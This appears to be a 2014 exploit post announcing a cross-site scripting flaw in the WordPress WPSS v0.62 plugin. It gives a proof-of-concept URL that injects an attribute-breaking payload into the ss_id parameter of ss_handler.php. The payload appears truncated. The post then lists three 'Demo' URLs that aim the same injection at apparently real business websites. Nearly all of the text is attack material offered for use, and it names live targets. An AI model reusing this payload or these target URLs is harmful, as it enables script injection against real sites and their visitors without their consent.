|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#| |-------------------------------------------------------------------------| | [*] Exploit Title: Wordpress WPSS v 0.62 Plugin Cross site scripting | | [*] Exploit Author: Ashiyane Digital Security Team | | [*] Date : 2014-08-05 | | [*] Vendor Homepage : http://timrohrer.com/blog/?page_id=71 | | [*] Software Link : http://timrohrer.com/blog/files/wpSS_v0.62.zip | | [*] Version : 0.62 | | [*] Tested on: Windows , Mozila Firefox |-------------------------------------------------------------------------| | [*] PoC : | | [*] [Localhost]/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id="/> | |-------------------------------------------------------------------------| | [*] Demo: | | [*] http://www.tahoebusinesses.com//wp-content/plugins/wpSS/ss_handler.php?ss_id="/> | | [*] http://www.forzabykemp.com/wp-content/plugins/wpSS/ss_handler.php?ss_id="/> | | [*] http://calgarysalesteam.com/wp-content/plugins/wpSS/ss_handler.php?ss_id="/> | |-------------------------------------------------------------------------| | [*]Discovered By : ACC3SS |-------------------------------------------------------------------------| |-------------------------------------------------------------------------| |#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|